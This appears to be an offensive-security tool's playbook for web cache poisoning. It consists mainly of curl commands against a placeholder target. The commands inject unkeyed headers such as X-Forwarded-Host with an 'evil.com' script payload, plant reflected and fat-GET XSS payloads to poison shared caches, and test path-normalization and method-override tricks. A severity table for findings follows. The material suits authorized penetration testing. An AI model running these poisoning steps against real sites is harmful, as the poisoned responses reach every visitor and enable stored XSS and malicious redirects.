attack-cache-poison
Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
Based on the professional SOC classification:
| Field | Value |
|---|---|
| name | attack-cache-poison |
| description | Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cache-poisoning","web","xss","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444","CWE-525"] |
| chains_with | ["attack-host-header","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-host-header":"Host header + cache = stored XSS/redirect affecting all users"} |
Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.
```bash
# Check cache headers (-D- dumps response headers to stdout)
curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"
# Identify cache key components (Vary header)
curl -s -D- https://TARGET/ | grep -i "vary"
```
Test headers that are reflected in the response but are NOT part of the cache key:
```bash
# X-Forwarded-Host
curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"
# X-Forwarded-Scheme
curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"
# X-Original-URL / X-Rewrite-URL
curl -s https://TARGET/ -H "X-Original-URL: /admin"
# Custom headers
curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"

# Poison with XSS payload
curl -s https://TARGET/ \
  -H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"
# Wait for the cache to store the response, then verify from a fresh request
curl -s https://TARGET/ | grep "alert(1)"

# Find parameters not in the cache key (cache-buster should not change x-cache hit/miss)
curl -s "https://TARGET/?cb=123" -D- | grep -i "x-cache"
curl -s "https://TARGET/?utm_source=evil" | grep "evil"
# Reflected unkeyed parameter -> stored XSS
curl -s "https://TARGET/?evil=<script>alert(1)</script>"
# Fat GET: request body sent with a GET request
curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"
# POST -> GET cache confusion
curl -s https://TARGET/ -X POST \
  -H "X-HTTP-Method-Override: GET" \
  -d "param=evil"

# Path normalization differences between cache and origin
curl -s "https://TARGET/path/../admin"
# Case sensitivity: compare the responses for /PATH and /path
curl -s "https://TARGET/PATH"
curl -s "https://TARGET/path"
# Delimiter / extension confusion
curl -s "https://TARGET/path;.js"
```
| Finding | Severity |
|---|---|
| Cached XSS payload served to other users | Critical (P1) |
| Cached redirect to attacker domain | High (P2) |
| Denial of service via cache poisoning (error page cached) | Medium (P3) |
| Unkeyed header reflected (no cache impact proven) | Low (P4) |